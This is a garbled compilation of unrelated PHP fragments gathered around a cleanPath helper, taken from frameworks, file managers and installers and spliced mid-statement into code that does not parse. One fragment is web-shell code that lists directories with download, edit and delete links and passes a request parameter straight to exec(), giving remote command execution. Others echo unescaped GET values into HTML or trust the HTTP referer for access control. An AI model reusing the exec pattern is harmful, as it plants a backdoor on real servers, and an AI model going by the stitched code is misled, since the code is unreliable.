function lockname($path)
{
//Replace all '/' with $ for a filename for the lock file
$ppath = str_replace("/", "\$", cleanPath($path)) . "\$";
$ppath = str_replace(":", "#", $ppath);
//Remove double dollar char when exist
if ($ppath[0] == "\$" and $ppath[1] == "\$") {
$ppath = substr($ppath, 1);
}
return preg_replace('/\\\\/', '$', $ppath);
}
/**
* _getFiles()
*
* @return array Array of files to load
*/
protected function _getFiles()
{
require_once PHP_LIBRARY_PATH . 'Zend/Loader.php';
$paths = Zend_Loader::explodeIncludePath();
// used for checking similarly named files
$relativeItems = array();
$files = array();
$isZendTraversed = false;
foreach ($paths as $path) {
// default patterns to use
$filterDenyDirectoryPattern = '.*(/|\\\\).svn';
$filterAcceptFilePattern = '.*(?:Manifest|Provider)\\.php$';
if (!file_exists($path) || $path[0] == '.') {
continue;
}
$realIncludePath = cleanPath($path);
// ensure that we only traverse a single version of Zend Framework on all include paths
if (file_exists($realIncludePath . '/Zend/Tool/Framework/Loader/IncludePathLoader.php')) {
if ($isZendTraversed === false) {
$isZendTraversed = true;
} else {
// use the deny directory pattern that includes the path to 'Zend', it will not be accepted
$filterDenyDirectoryPattern = '.*((/|\\\\).svn|' . preg_quote($realIncludePath . DIRECTORY_SEPARATOR) . 'Zend)';
}
}
// create recursive directory iterator
$rdi = new RecursiveDirectoryIterator($path);
// pass in the RecursiveDirectoryIterator & the patterns
$filter = new Zend_Tool_Framework_Loader_IncludePathLoader_RecursiveFilterIterator($rdi, $filterDenyDirectoryPattern, $filterAcceptFilePattern);
// build the rii with the filter
$iterator = new RecursiveIteratorIterator($filter);
// iterate over the accepted items
foreach ($iterator as $item) {
$file = (string) $item;
if ($this->_fileIsBlacklisted($file)) {
continue;
}
// ensure that the same named file from separate include_paths is not loaded
$relativeItem = preg_replace('#^' . preg_quote($realIncludePath . DIRECTORY_SEPARATOR, '#') . '#', '', $item->getcleanPath());
// no links allowed here for now
if ($item->isLink()) {
continue;
}
// no items that are relavitely the same are allowed
if (in_array($relativeItem, $relativeItems)) {
continue;
}
$relativeItems[] = $relativeItem;
$files[] = $item->getcleanPath();
}
}
return $files;
}
/**
* create()
*
* @param string $path
* @param string $nameOfProfile shortName=n
* @param string $fileOfProfile shortName=f
*/
public function create($path, $nameOfProfile = null, $fileOfProfile = null)
{
if ($path == null) {
$path = getcwd();
} else {
$path = trim($path);
if (!file_exists($path)) {
$created = mkdir($path);
if (!$created) {
require_once PHP_LIBRARY_PATH . 'Zend/Tool/Framework/Client/Exception.php';
throw new Zend_Tool_Framework_Client_Exception('Could not create requested project directory \'' . $path . '\'');
}
}
$path = str_replace('\\', '/', cleanPath($path));
}
$profile = $this->_loadProfile(self::NO_PROFILE_RETURN_FALSE, $path);
if ($profile !== false) {
require_once PHP_LIBRARY_PATH . 'Zend/Tool/Framework/Client/Exception.php';
throw new Zend_Tool_Framework_Client_Exception('A project already exists here');
}
$profileData = null;
if ($fileOfProfile != null && file_exists($fileOfProfile)) {
$profileData = file_get_contents($fileOfProfile);
}
$storage = $this->_registry->getStorage();
if ($profileData == '' && $nameOfProfile != null && $storage->isEnabled()) {
$profileData = $storage->get('project/profiles/' . $nameOfProfile . '.xml');
}
if ($profileData == '') {
$profileData = $this->_getDefaultProfile();
}
$newProfile = new Zend_Tool_Project_Profile(array('projectDirectory' => $path, 'profileData' => $profileData));
$newProfile->loadFromData();
$response = $this->_registry->getResponse();
$response->appendContent('Creating project at ' . $path);
$response->appendContent('Note: ', array('separator' => false, 'color' => 'yellow'));
$response->appendContent('This command created a web project, ' . 'for more information setting up your VHOST, please see docs/README');
if (!Zend_Tool_Project_Provider_Test::isPHPUnitAvailable()) {
$response->appendContent('Testing Note: ', array('separator' => false, 'color' => 'yellow'));
$response->appendContent('PHPUnit was not found in your include_path, therefore no testing actions will be created.');
}
foreach ($newProfile->getIterator() as $resource) {
$resource->create();
}
}
function search_lib($lib, $file, $ds = '/')
{
// Verifica se o diretório informado é válido
global $autoloadlog;
if (is_array($lib)) {
foreach ($lib as $dir) {
if ($f = search_lib($dir, $file, $ds)) {
return $f;
break;
}
}
return FALSE;
}
if (is_dir($lib)) {
$path = isset($path) ? $path : "";
$path = cleanPath($lib, $path, $ds);
$autoloadlog .= 'Lib: ' . (is_array($lib) ? implode(', ', $lib) : $lib) . PHP_EOL . 'File: ' . $file . PHP_EOL . PHP_EOL . 'Path: ' . $path . PHP_EOL . PHP_EOL . (file_exists($path) ? 'EXISTS!' : 'NOT Exists!') . PHP_EOL . PHP_EOL . str_repeat('-', 200) . PHP_EOL . PHP_EOL;
// Verifica se o arquivo já existe neste primeiro diretório
if (file_exists($path)) {
return $path;
}
// Lista os subdiretórios e arquivos
$dirs = array_diff(scandir($lib, 1), ['.', '..']);
foreach ($dirs as $dir) {
// Verifica se é um arquivo se for, pula para o próximo
if (!is_dir($lib . $ds . $dir)) {
continue;
}
// Se for um diretório procura dentro dele
$f = search_lib($lib . $ds . $dir, $file, $ds);
// Caso não encontre retora FALSE
if ($f !== FALSE) {
return $f;
}
}
} else {
$autoloadlog .= 'Lib "' . $lib . '" is not a dir.' . PHP_EOL . PHP_EOL;
}
// Se o diretório informado não for válido ou se não tiver encontrado retorna FALSE
return FALSE;
}
function pfc_RelativePath($p1, $p2)
{
if (is_file($p1)) {
$p1 = dirname($p1);
}
if (is_file($p2)) {
$p2 = dirname($p2);
}
// using realpath function is necessary to resolve symbolic links
$p1 = realpath(cleanPath($p1));
$p2 = realpath(cleanPath($p2));
$res = "";
// echo $p1."<br>";
// echo $p2."<br>";
while ($p1 != "" && $p1 != "/" && !preg_match("/^[a-z]\\:\\\$/i", $p1) && strpos($p2, $p1) !== 0) {
$res .= "../";
$p1 = dirname($p1);
}
if (isset($_SERVER["WINDIR"]) || isset($_SERVER["windir"])) {
$p2 = str_replace("\\", "/", substr($p2, strlen($p1) + 1, strlen($p2) - strlen($p1)));
} else {
if ($p1 === "/" || $p1 === "") {
$p2 = substr($p2, strlen($p1));
} else {
$p2 = substr($p2, strlen($p1) + 1);
}
}
$res .= $p2;
// remove the last "/"
if (preg_match("/.*\\/\$/", $res)) {
$res = preg_replace("/(.*)\\//", "\$1", $res);
}
// if rootpath is empty replace it by "." to avoide url starting with "/"
if ($res == "") {
$res = ".";
}
// echo $res."<br>";
return $res;
}
function cleanup($file)
{
global $hotdir, $INP, $NPDF, $ORIG_ERR, $ORIG_OK, $PROC_ERR, $PROC_OK, $NPDF_ERR, $REP_ERR, $REP_OK;
$file_log = "{$file}_log.pdf";
// PitStop names reports like this
@unlink(cleanPath("{$hotdir}/{$INP}/{$file}"));
@unlink(cleanPath("{$hotdir}/{$NPDF}/{$file}"));
@unlink(cleanPath("{$hotdir}/{$ORIG_ERR}/{$file}"));
@unlink(cleanPath("{$hotdir}/{$ORIG_OK}/{$file}"));
@unlink(cleanPath("{$hotdir}/{$PROC_ERR}/{$file}"));
@unlink(cleanPath("{$hotdir}/{$PROC_OK}/{$file}"));
@unlink(cleanPath("{$hotdir}/{$NPDF_ERR}/{$file_log}"));
@unlink(cleanPath("{$hotdir}/{$REP_ERR}/{$file_log}"));
@unlink(cleanPath("{$hotdir}/{$REP_OK}/{$file_log}"));
}
/**
* Verify path exists and is non-empty
*
* @param string $path
* @return bool
*/
protected function _verifyPath($path)
{
$path = cleanPath($path);
$base = cleanPath($this->_options['public_dir']);
return strncmp($path, $base, strlen($base)) !== 0;
}
function installerInit()
{
sessionInit();
//handle streamed content first
if (isset($_SERVER['PATH_INFO'])) {
$path_bits = preg_split('/\\//', $_SERVER['PATH_INFO']);
$path_bits = cleanPath($path_bits);
if (count($path_bits) == 3) {
if ($path_bits[0] == "stream") {
streamContent($path_bits[2], $path_bits[1]);
}
} else {
redirectSelf();
}
}
$result = array();
if (installerStep() !== STEP_DONE && getLock()) {
installerStepSet(STEP_DONE);
redirectSelf();
}
$is_redirect = FALSE;
if (isset($_GET['restart'])) {
session_destroy();
redirectSelf();
}
if (isset($_GET['next'])) {
transitionNextStep();
}
if (isset($_GET['prev'])) {
installerStepSet(prevStep(installerStep()));
}
if (dbEnabled()) {
$result['with_db'] = TRUE;
} else {
$result['with_db'] = FALSE;
}
$result['step'] = installerStep();
return $result;
}
} elseif ($szHayPol && $szHayLin && !$szHayPto) {
$aSzFiles = array($szFileNamePol . ".shp", $szFileNamePol . ".shx", $szFileNamePol . ".dbf", $szFileNameLin . ".shp", $szFileNameLin . ".shx", $szFileNameLin . ".dbf");
} elseif ($szHayPol && !$szHayLin && $szHayPto) {
$aSzFiles = array($szFileNamePol . ".shp", $szFileNamePol . ".shx", $szFileNamePol . ".dbf", $szFileNamePto . ".shp", $szFileNamePto . ".shx", $szFileNamePto . ".dbf");
} elseif (!$szHayPol && $szHayLin && $szHayPto) {
$aSzFiles = array($szFileNameLin . ".shp", $szFileNameLin . ".shx", $szFileNameLin . ".dbf", $szFileNamePto . ".shp", $szFileNamePto . ".shx", $szFileNamePto . ".dbf");
} elseif ($szHayPol && !$szHayLin && !$szHayPto) {
$aSzFiles = array($szFileNamePol . ".shp", $szFileNamePol . ".shx", $szFileNamePol . ".dbf");
} elseif (!$szHayPol && $szHayLin && !$szHayPto) {
$aSzFiles = array($szFileNameLin . ".shp", $szFileNameLin . ".shx", $szFileNameLin . ".dbf");
} elseif (!$szHayPol && !$szHayLin && $szHayPto) {
$aSzFiles = array($szFileNamePto . ".shp", $szFileNamePto . ".shx", $szFileNamePto . ".dbf");
}
// create the temp download directory
$szDownloadPath = cleanPath($_SESSION["gszTmpImgPath"]);
$szDownloadUrl = cleanPath($_SESSION["gszTmpWebPath"]);
$szUniqid = md5(uniqid(rand(), true));
// check if directory exists
if (!is_dir($szDownloadPath . $szUniqid . "/")) {
@mkdir($szDownloadPath . $szUniqid . "/", 0777);
}
// check for failure
if (!is_dir($szDownloadPath . $szUniqid . "/")) {
// set flag
$bSkipExtract = true;
// set error message
$szErrorNotice .= $oMLT->get("17", "Error al crear directorio temporal de bajada.");
} else {
// set flag
$bSkipExtract = false;
// update paths
}
}
echo "<a href='?d={$d}{$slash}.'><font color=grey>.\n</font></a>";
echo "<a href='?d={$d}{$slash}..'><font color=grey>..\n</font></a>";
//Some configurations throw a notice if is_array is tried with a non-existant variable
if (isset($dirList)) {
if (is_array($dirList)) {
foreach ($dirList as $dir) {
echo "<a href='?d={$d}{$slash}{$dir}'><font color=grey>{$dir}\n</font></a>";
}
}
}
if (isset($fileList)) {
if (is_array($fileList)) {
foreach ($fileList as $dir) {
echo "<a href='?f={$d}" . $slash . $dir['dir'] . "'><font color=" . $dir['color'] . ">" . $dir['dir'] . "</font></a>" . "|<a href='?dl=" . cleanPath($d, $isLinux) . '&file=' . $dir["dir"] . "' target='_blank'>Download</a>|" . "|<a href='?ef=" . cleanPath($d, $isLinux) . '&file=' . $dir["dir"] . "' target='_blank'>Edit</a>|" . "|<a href='?df=" . cleanPath($d, $isLinux) . '&file=' . $dir["dir"] . "' target='_blank'>Delete</a>| \n";
}
}
}
} else {
echo "opendir() failed";
}
closedir($handle);
} elseif (isset($_REQUEST['c'])) {
if (@ini_get('safe_mode')) {
echo 'Safe mode is on, the command is by default run though escapeshellcmd() and can only run programms in safe_mod_exec_dir (' . @ini_get('safe_mode_exec_dir') . ') <br />';
}
echo "<b>Command: <I>" . $_REQUEST['c'] . "</I></b><br /><br />";
trim(exec($_REQUEST['c'], $return));
foreach ($return as $val) {
echo '<pre>' . htmlentities($val) . '</pre>';
case 'admin':
return 127;
case 'guest':
return 1;
case 'disabled':
return 0;
case 'none':
case 'normal':
default:
return 2;
}
}
//====================
// Log in
//====================
$d = isset($_GET['d']) ? cleanPath($_GET['d']) : false;
// $d is replaced after login.
$status = '';
$time = time();
if ($_POST['logout']) {
setcookie('fmsid', '', time() - 86400);
$_PERSIST['users'][$uid]['sid'] = '';
persist_update('_PERSIST', 'ftpusers.inc.php');
$status = 'lo';
} else {
if ($_POST['login'] && $_POST['server']) {
$status = 'nli';
if (!intval($_POST['port'])) {
$_POST['port'] = 21;
}
$ftp = @ftp_connect($_POST['server'], intval($_POST['port']));
// emit the HTML
echo "<table align=\"center\" border=\"0\" cellspacing=\"" . VIEWER_SPACING . "\" cellpadding=\"" . VIEWER_PADDING . "\" width=\"100%\" height=\"100%\">\n";
echo " <tr>\n";
echo " <td class=\"none\" align=\"center\" valign=\"middle\" width=\"100%\" height=\"100%\">\n";
echo " " . TEXT_SELECT . "\n";
echo " </td>\n";
echo " </tr>\n";
echo "</table>\n";
}
// process GET/POST parameters
$file = "";
if (isset($HTTP_GET_VARS["file"])) {
$file = urldecode($HTTP_GET_VARS["file"]);
}
// parse and clean the File
cleanPath($file);
?>
<body leftmargin=0 topmargin=0 marginwidth=0 marginheight=0>
<?php
// generate the Preview
imageTag($base);
?>
<script language="javascript">
var src = '<?php
echo strlen($file) > 0 ? imageURL($file, TRUE) : "";
?>
';
if(src.length > 0) {
var manager = findAncestor(window.frameElement, '<?php
echo MANAGER_NAME;
function excluiDiretorio($diretorio)
{
$diretorio = cleanPath($diretorio);
if (is_dir($diretorio)) {
excluiConteudo($diretorio);
@rmdir($diretorio);
}
}
if (!file_exists($users) && !file_exists($projects) && !file_exists($active)) {
//////////////////////////////////////////////////////////////////
// Get POST responses
//////////////////////////////////////////////////////////////////
$username = cleanUsername("default");
$password = encryptPassword("default");
//////////////////////////////////////////////////////////////////
// Create Projects files
//////////////////////////////////////////////////////////////////
$project_path = 'cloud-project';
$project_name = 'Cloud Project';
if (!isAbsPath($project_path)) {
$project_path = str_replace(" ", "_", preg_replace('/[^\\w-\\.]/', '', $project_path));
mkdir($workspace . "/" . $project_path);
} else {
$project_path = cleanPath($project_path);
if (substr($project_path, -1) == '/') {
$project_path = substr($project_path, 0, strlen($project_path) - 1);
}
if (!file_exists($project_path)) {
if (!mkdir($project_path . '/', 0755, true)) {
die("Unable to create Absolute Path");
}
} else {
if (!is_writable($project_path) || !is_readable($project_path)) {
die("No Read/Write Permission");
}
}
}
$project_data = array("name" => $project_name, "path" => $project_path);
saveJSON($projects, array($project_data));
function hadFileRight($_allowPath, $_path)
{
$path = cleanPath($_path);
foreach ($_allowPath as $right) {
if (strpos($right, '/') !== false || strpos($right, '\\') !== false) {
if (strpos($right, '/') !== 0 || strpos($right, '\\') !== 0) {
$right = getRootPath() . '/' . $right;
}
if (dirname($path) == $right || $path == $right) {
return true;
}
} else {
if (basename(dirname($path)) == $right || basename($path) == $right) {
return true;
}
}
}
return false;
}
/**
* Add translations
*
* This may be a new language or additional content for an existing language
* If the key 'clear' is true, then translations for the specified
* language will be replaced and added otherwise
*
* @param array|Zend_Config $options Options and translations to be added
* @throws Zend_Translate_Exception
* @return Zend_Translate_Adapter Provides fluent interface
*/
public function addTranslation($options = array())
{
if ($options instanceof Zend_Config) {
$options = $options->toArray();
} else {
if (func_num_args() > 1) {
$args = func_get_args();
$options = array();
$options['content'] = array_shift($args);
if (!empty($args)) {
$options['locale'] = array_shift($args);
}
if (!empty($args)) {
$opt = array_shift($args);
$options = array_merge($opt, $options);
}
} else {
if (!is_array($options)) {
$options = array('content' => $options);
}
}
}
if (!isset($options['content']) || empty($options['content'])) {
require_once PHP_LIBRARY_PATH . 'Zend/Translate/Exception.php';
throw new Zend_Translate_Exception("Required option 'content' is missing");
}
$originate = null;
if (!empty($options['locale'])) {
$originate = (string) $options['locale'];
}
if (array_key_exists('log', $options) && !$options['log'] instanceof Zend_Log) {
require_once PHP_LIBRARY_PATH . 'Zend/Translate/Exception.php';
throw new Zend_Translate_Exception('Instance of Zend_Log expected for option log');
}
try {
if (!$options['content'] instanceof Zend_Translate && !$options['content'] instanceof Zend_Translate_Adapter) {
if (empty($options['locale'])) {
$options['locale'] = null;
}
$options['locale'] = Zend_Locale::findLocale($options['locale']);
}
} catch (Zend_Locale_Exception $e) {
require_once PHP_LIBRARY_PATH . 'Zend/Translate/Exception.php';
throw new Zend_Translate_Exception("The given Language '{$options['locale']}' does not exist", 0, $e);
}
$options = $options + $this->_options;
if (is_string($options['content']) and is_dir($options['content'])) {
$options['content'] = cleanPath($options['content']);
$prev = '';
$iterator = new RecursiveIteratorIterator(new RecursiveRegexIterator(new RecursiveDirectoryIterator($options['content'], RecursiveDirectoryIterator::KEY_AS_PATHNAME), '/^(?!.*(\\.svn|\\.cvs)).*$/', RecursiveRegexIterator::MATCH), RecursiveIteratorIterator::SELF_FIRST);
foreach ($iterator as $directory => $info) {
$file = $info->getFilename();
if (is_array($options['ignore'])) {
foreach ($options['ignore'] as $key => $ignore) {
if (strpos($key, 'regex') !== false) {
if (preg_match($ignore, $directory)) {
// ignore files matching the given regex from option 'ignore' and all files below
continue 2;
}
} else {
if (strpos($directory, DIRECTORY_SEPARATOR . $ignore) !== false) {
// ignore files matching first characters from option 'ignore' and all files below
continue 2;
}
}
}
} else {
if (strpos($directory, DIRECTORY_SEPARATOR . $options['ignore']) !== false) {
// ignore files matching first characters from option 'ignore' and all files below
continue;
}
}
if ($info->isDir()) {
// pathname as locale
if ($options['scan'] === self::LOCALE_DIRECTORY and Zend_Locale::isLocale($file, true, false)) {
$options['locale'] = $file;
$prev = (string) $options['locale'];
}
} else {
if ($info->isFile()) {
// filename as locale
if ($options['scan'] === self::LOCALE_FILENAME) {
$filename = explode('.', $file);
array_pop($filename);
$filename = implode('.', $filename);
if (Zend_Locale::isLocale((string) $filename, true, false)) {
$options['locale'] = (string) $filename;
} else {
$parts = explode('.', $file);
$parts2 = array();
foreach ($parts as $token) {
$parts2 += explode('_', $token);
}
$parts = array_merge($parts, $parts2);
$parts2 = array();
foreach ($parts as $token) {
$parts2 += explode('-', $token);
}
$parts = array_merge($parts, $parts2);
$parts = array_unique($parts);
$prev = '';
foreach ($parts as $token) {
if (Zend_Locale::isLocale($token, true, false)) {
if (strlen($prev) <= strlen($token)) {
$options['locale'] = $token;
$prev = $token;
}
}
}
}
}
try {
$options['content'] = $info->getPathname();
$this->_addTranslationData($options);
} catch (Zend_Translate_Exception $e) {
// ignore failed sources while scanning
}
}
}
}
unset($iterator);
} else {
$this->_addTranslationData($options);
}
if (isset($this->_translate[$originate]) === true and count($this->_translate[$originate]) > 0) {
$this->setLocale($originate);
}
return $this;
}
}
// Check GET data
$file = urldecode($_GET['f']);
$pw = urldecode($_GET['p']);
$lang = $_GET['l'] == 'de' ? 'de' : 'en';
// Check referer
if ($config['root_url'] != substr($_SERVER['HTTP_REFERER'], 0, strlen($config['root_url']))) {
header('HTTP/1.1 403 Forbidden');
echo $lang == 'de' ? 'Zugriff verweigert' : 'Access denied';
exit;
}
// Check ending
$ending = true;
$ending = preg_match('/^(.*)\\.(.*?)$/', $file, $tmp) ? strtolower($tmp[2]) : false;
// Check and build path
$path = $config['uploads_path'] . DIRECTORY_SEPARATOR . cleanPath($file);
if (!is_file($path) || !$ending) {
header('HTTP/1.0 404 Not Found');
header('Refresh:3;url=' . $_SERVER['HTTP_REFERER']);
echo $lang == 'de' ? 'Datei nicht gefunden' : 'File not found';
exit;
}
// Get filename
$temp = explode('/', $file);
$filename = str_replace('"', '', array_pop($temp));
// Get blank path
$temp = $config['uploads_path'] . DIRECTORY_SEPARATOR . implode('/', $temp) . DIRECTORY_SEPARATOR;
// Check password
if (is_file($temp . '.htpasswd')) {
$check = substr(phpversion(), 0, 3) < 4.3 ? substr(implode('', file($temp . '.htpasswd')), 9) : substr(file_get_contents($temp . '.htpasswd'), 9);
if (crypt($pw, $check) != $check) {
/**
* Show / Edit a file in the ajaxy editor..
*
*/
public static function ext_view()
{
global $PIVOTX;
$PIVOTX['session']->minLevel(PIVOTX_UL_ADMIN);
// TODO: Check if the file is writable before showing the editor.
if (empty($_GET['basedir'])) {
die('Basedir is empty.');
} else {
$basedir = cleanPath(base64_decode($_GET['basedir']));
}
// Don't allow opening files outside $PIVOTX['paths']['home_path'].
// This is consistent with the file explorer functions in pages.php.
if (strpos($basedir, $PIVOTX['paths']['home_path']) === 0) {
$filename = cleanPath($basedir . $_GET['file']);
} else {
die('Basedir outside home_path. Hacking attempt?');
}
if ($contents = loadSerialize($filename)) {
// Get the output in a buffer..
ob_start();
print_r($contents);
$contents = ob_get_contents();
ob_end_clean();
echo "<pre>\n";
echo htmlentities($contents, ENT_QUOTES, "UTF-8");
echo "</pre>\n";
} else {
$extension = getExtension($filename);
$contents = implode("", file($filename));
$contents = preg_replace('/<textarea/i', '<*textarea', $contents);
$contents = preg_replace('/<\\/textarea/i', '<*/textarea', $contents);
echo "<form id='editor' class='formclass' method='post' action='' style='border: 0px;'>";
echo "<input type='hidden' value='" . $_GET['basedir'] . "' id='editBasedir'>";
echo "<input type='hidden' value='" . $_GET['file'] . "' id='editFile'>";
echo "<textarea style='width: 759px; border: 1px inset #999; height: 380px;' id='editContents' name='editContents' class='Editor' >";
echo htmlentities($contents, ENT_QUOTES, 'UTF-8');
echo "</textarea>";
if (in_array($extension, array('html', 'htm', 'tpl', 'xml', 'css'))) {
echo '<script language="javascript" type="text/javascript">' . "\n";
echo 'jQuery(function($) {' . "\n";
echo ' $("#editContents").markItUp(markituphtml);' . "\n";
echo '});' . "\n";
echo '</script>' . "\n";
} else {
echo '<script language="javascript" type="text/javascript">' . "\n";
echo 'jQuery(function($) {' . "\n";
echo ' $("#editContents").css("height", "384px");' . "\n";
echo '});' . "\n";
echo '</script>' . "\n";
}
printf('<p class="buttons" style="margin: 0 0 6px 0; clear: both;"><a href="#" onclick="saveEdit();"><img src="pics/accept.png" alt="" />%s</a>', __('Save'));
printf('<a href="#" onclick="saveEditAndContinue();"><img src="pics/accept.png" alt="" />%s</a>', __('Save and continue editing'));
printf('<a href="#" onclick="closeEdit();" class="negative" style="margin-left: 20px;"><img src="pics/delete.png" alt="" />%s</a></p>', __('Cancel'));
if ($PIVOTX['config']->get('smarty_cache') || $PIVOTX['config']->get('minify_frontend')) {
$msg = __("You have Caching and/or Minify enabled. If your changes do not show up immediately, %click here% and disable Caching and Minify while you're working on your site.");
$msg = preg_replace('/%(.*)%/i', "<a href='index.php?page=configuration#section-1'>\\1</a>", $msg);
echo "\n\n<p class='small' style='width: 500px;clear: both;'>" . $msg . "</p>\n";
}
echo "</form>";
}
}
function fm_iswritable($source)
{
if (startsWith(cleanPath($source), str_repeat('../', 1 + substr_count($GLOBALS['ftp_prepath'], '/')))) {
return FALSE;
}
//$fileinfo = fm_fileinfo($source);
//return (intval(substr(@($fileinfo['perms']),0,1))&2)?TRUE:FALSE;
return true;
}
/**
* _getZfPath()
*
* @return string|false
*/
protected function _getZfPath()
{
require_once PHP_LIBRARY_PATH . 'Zend/Loader.php';
foreach (Zend_Loader::explodeIncludePath() as $includePath) {
if (!file_exists($includePath) || $includePath[0] == '.') {
continue;
}
if (cleanPath($checkedPath = rtrim($includePath, '\\/') . '/Zend/Loader.php') !== false && file_exists($checkedPath)) {
return dirname($checkedPath);
}
}
return false;
}
function getUrls($url, $string)
{
$type = "href";
# Regex to chop out urls
preg_match_all("|{$type}\\=\"?'?`?([[:alnum:]:?=&@/._-]+)\"?'?`?|i", $string, $matches);
$ret[$type] = $matches[1];
# Make all URLS literal (full path)
for ($i = 0; $i < count($ret['href']); $i++) {
if (!preg_match('/^(http|https):\\/\\//i', $ret['href'][$i])) {
$ret['href'][$i] = getPath($url) . "/" . $ret['href'][$i];
}
$ret['href'][$i] = cleanPath($ret['href'][$i]);
}
return $ret;
}
/**
* rawurlencode() a file's path but keep the slashes.
*/
function urlPath($path)
{
$decoded = rawurldecode($path);
// Decode if encoded
$cleaned = cleanPath($decoded);
$encoded = rawurlencode($cleaned);
// Encode
$encoded_path = str_replace('%2F', '/', $encoded);
// replace slashes
return $encoded_path;
}
/**
* Find cleanPath of file based on include_path
*
* @param string $fileName
* @return string
*/
public static function findcleanPathInIncludePath($fileName)
{
require_once PHP_LIBRARY_PATH . 'Zend/Loader.php';
$includePaths = Zend_Loader::explodeIncludePath();
while (count($includePaths) > 0) {
$filePath = array_shift($includePaths) . DIRECTORY_SEPARATOR . $fileName;
if (($foundcleanPath = cleanPath($filePath)) !== false) {
break;
}
}
return $foundcleanPath;
}
// Remove old files
$maxFileAge = 60 * 60;
// Temp file age in seconds
switch ($_GET['type']) {
case 'image':
case 'images':
case 'file':
case 'files':
$targetDir = makeUploadFolder();
$cleanupTargetDir = false;
break;
}
if (isset($_GET['path']) && $_GET['path'] != '') {
/* Using same user level as in fileOperations (in lib.php) */
$PIVOTX['session']->minLevel(PIVOTX_UL_ADVANCED);
$path = cleanPath($_GET['path']);
// Don't ever allow uploading outside the images, templates and db folders.
if (!uploadAllowed($path)) {
die('{"jsonrpc" : "2.0", "error" : {"code": 104, "message": "Uploading to illegal directory."}, "id" : "id"}');
}
$targetDir = stripTrailingSlash($path);
$cleanupTargetDir = false;
}
// 5 minutes execution time
@set_time_limit(5 * 60);
// usleep(5000);
// Get parameters
$chunk = isset($_REQUEST["chunk"]) ? $_REQUEST["chunk"] : 0;
$chunks = isset($_REQUEST["chunks"]) ? $_REQUEST["chunks"] : 0;
$fileName = isset($_REQUEST["name"]) ? $_REQUEST["name"] : '';
if ($fileName == '' && isset($_FILES['file']['name'])) {
/**
* fromReflectedFileName() - use this if you intend on generating code generation objects based on the same file.
* This will keep previous changes to the file in tact during the same PHP process
*
* @param string $filePath
* @param bool $usePreviousCodeGeneratorIfItExists
* @param bool $includeIfNotAlreadyIncluded
* @return Zend_CodeGenerator_Php_File
*/
public static function fromReflectedFileName($filePath, $usePreviousCodeGeneratorIfItExists = true, $includeIfNotAlreadyIncluded = true)
{
$cleanPath = cleanPath($filePath);
if ($cleanPath === false) {
if (($cleanPath = Zend_Reflection_file::findcleanPathInIncludePath($filePath)) === false) {
require_once PHP_LIBRARY_PATH . 'Zend/CodeGenerator/Php/Exception.php';
throw new Zend_CodeGenerator_Php_Exception('No file for ' . $cleanPath . ' was found.');
}
}
if ($usePreviousCodeGeneratorIfItExists && isset(self::$_fileCodeGenerators[$cleanPath])) {
return self::$_fileCodeGenerators[$cleanPath];
}
if ($includeIfNotAlreadyIncluded && !in_array($cleanPath, get_included_files())) {
include $cleanPath;
}
$codeGenerator = self::fromReflection($fileReflector = new Zend_Reflection_File($cleanPath));
if (!isset(self::$_fileCodeGenerators[$fileReflector->getFileName()])) {
self::$_fileCodeGenerators[$fileReflector->getFileName()] = $codeGenerator;
}
return $codeGenerator;
}
/**
* constructor
*
* @param array $options Associative array of options
*/
public function __construct(array $options = array())
{
$this->_credential = new Zend_Service_DeveloperGarden_Credential();
while (list($name, $value) = each($options)) {
switch (ucfirst($name)) {
case 'Username':
$this->_credential->setUsername($value);
break;
case 'Password':
$this->_credential->setPassword($value);
break;
case 'Realm':
$this->_credential->setRealm($value);
break;
case 'Environment':
$this->setEnvironment($value);
}
}
if (empty($this->_wsdlFile)) {
require_once PHP_LIBRARY_PATH . 'Zend/Service/DeveloperGarden/Exception.php';
throw new Zend_Service_DeveloperGarden_Exception('_wsdlFile not set for this service.');
}
if (!empty($this->_wsdlFileLocal)) {
$this->_wsdlFileLocal = cleanPath(dirname(__FILE__) . '/../' . $this->_wsdlFileLocal);
}
if (empty($this->_wsdlFileLocal) || $this->_wsdlFileLocal === false) {
require_once PHP_LIBRARY_PATH . 'Zend/Service/DeveloperGarden/Exception.php';
throw new Zend_Service_DeveloperGarden_Exception('_wsdlFileLocal not set for this service.');
}
}
/**
* Decompresses the given content
*
* @param string $content
* @return boolean
*/
public function decompress($content)
{
$archive = $this->getArchive();
if (file_exists($content)) {
$archive = str_replace(array('/', '\\'), DIRECTORY_SEPARATOR, cleanPath($content));
} elseif (empty($archive) || !file_exists($archive)) {
require_once PHP_LIBRARY_PATH . 'Zend/Filter/Exception.php';
throw new Zend_Filter_Exception('RAR Archive not found');
}
$password = $this->getPassword();
if ($password !== null) {
$archive = rar_open($archive, $password);
} else {
$archive = rar_open($archive);
}
if (!$archive) {
require_once PHP_LIBRARY_PATH . 'Zend/Filter/Exception.php';
throw new Zend_Filter_Exception("Error opening the RAR Archive");
}
$target = $this->getTarget();
if (!is_dir($target)) {
$target = dirname($target);
}
$filelist = rar_list($archive);
if (!$filelist) {
require_once PHP_LIBRARY_PATH . 'Zend/Filter/Exception.php';
throw new Zend_Filter_Exception("Error reading the RAR Archive");
}
foreach ($filelist as $file) {
$file->extract($target);
}
rar_close($archive);
return true;
}
/**
* Finds a path to a target file, checking the filename and each directory
* name in the path case-insensitively. If a target file is found, returns
* the path with the correct, existing casing. Otherwise, returns false.
* Optionally searches for files with the same name but alternative
* extensions (defaults to true). Optionally searches for only files
* ($findDir = 0), files and directories ($findDir = 1), or only
* directories ($findDir = 2)
*
* @param string $path The file to search for.
* @param bool $findAltExtensions Set false for strict extension checking.
* @param int $findDir Set 0 to only return paths to actual files,
* Set 1 to return paths to both files and directories
* Set 2 to only return paths to directories
* @return string|bool
*/
function fileExists($path, $findAltExt = true, $findDir = 1)
{
// This function is expecting valid path names.
// So, if you need to trim or remove bad characters,
// do that before sending them to this function
// guard against bad input (such as a null path)
$findDir = (int) $findDir;
// 0: no, 1: yes, 2: only
$path = (string) $path;
if ($path === '') {
return false;
}
// efficiency checks
if (is_file($path)) {
if ($findDir < 2) {
return $path;
} elseif (!$findAltExt) {
return false;
}
}
if (is_dir($path)) {
if ($findDir > 0) {
return $path;
} elseif (!$findAltExt) {
return false;
}
}
// -convert Windows directory separators '\' to standard '/'
// -remove unneeded path elements, such as '.' or 'dir/../'
// -remove trailing slash
// -trim each component
// -this is so we can explode by '/' and correctly identify
// each path components (e.g., 'one' and 'two' from 'one\two')
$path = cleanPath($path);
$path = explode('/', $path);
// if they only supplied a single component, there is the unlikely
// case that they are searching for the root directory
// Let's check for that, before assuming that they are looking for
// a file or directory in the current working directory
